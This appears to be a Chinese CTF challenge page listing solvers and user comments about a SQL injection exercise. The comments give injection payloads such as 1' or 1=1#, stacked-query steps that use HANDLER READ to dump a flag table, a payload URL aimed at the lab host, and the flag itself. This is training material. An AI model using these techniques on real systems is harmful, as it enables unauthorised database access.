评分(8)
解题动态
用心好吗笨蛋 攻破了该题 2小时前
bababei 攻破了该题 2小时前
pigbigstrong 攻破了该题 3小时前
yanzhenfeng 攻破了该题 9小时前
1877594554o 攻破了该题 23小时前
fwsw 攻破了该题 1天前
mushmush 攻破了该题 1天前
cfggfbfxdgbb 攻破了该题 1天前
MiGooli 攻破了该题 2天前
6zekun 攻破了该题 4天前
土豆班长 攻破了该题 4天前
688bugku 攻破了该题 4天前
kwokctf 攻破了该题 4天前
18267395325 攻破了该题 5天前
nihaolmb 攻破了该题 5天前
fmjjkk 攻破了该题 5天前
adsas 攻破了该题 6天前
yiqiuyu 攻破了该题 6天前
派大星和海绵宝宝 攻破了该题 6天前
评论
Jasper97 1月前
举报
用万能钥匙1’or’1=1或者1’or true#或者1’ or 1#等等都可以爆出文件内所有内容我也不知道为什么。
Jasper97 1月前
举报
具体方法就是1.handler flag open as (随便取一个别名) 2.handler (你取的别名)read next;handler (你取的别名)read next...(可以这样一行一行读下去...)。最后就能发现几个假的flag和真的flag。
Jasper97 1月前
举报
堆叠注入:用分号间隔可以执行多条查询语句。利用这个方法可以show databases显示数据库,show tables显示当前数据库内的表名,show columns from #显示#中的所有列名。发现flag表中的data可疑。 但是select被禁用,可以用handler函数读取文件。具体方法就是
zzz666 1月前
举报
1' or 1=1#万能密码直接就出了,离谱
Zhumeng 1月前
举报
'or 1=1- -- 直接秒 这道题有点像随便注
八一卜kod 2月前
举报
>> bugku
yaozhiwang 2月前
举报
http://114.67.175.224:15398/?id=1%27+or+1%3D1%23
yaozhiwang 2月前
举报
1' or 1=1 #
迷茫的三千面 2月前
举报
flag{dcc7859119dd6edd658e740060cfabb4}
似舞夜春 3月前
举报
不是,万能密码1' or 1=1--+直接出了?
yaozhiwang 2月前
举报
可以,直接秒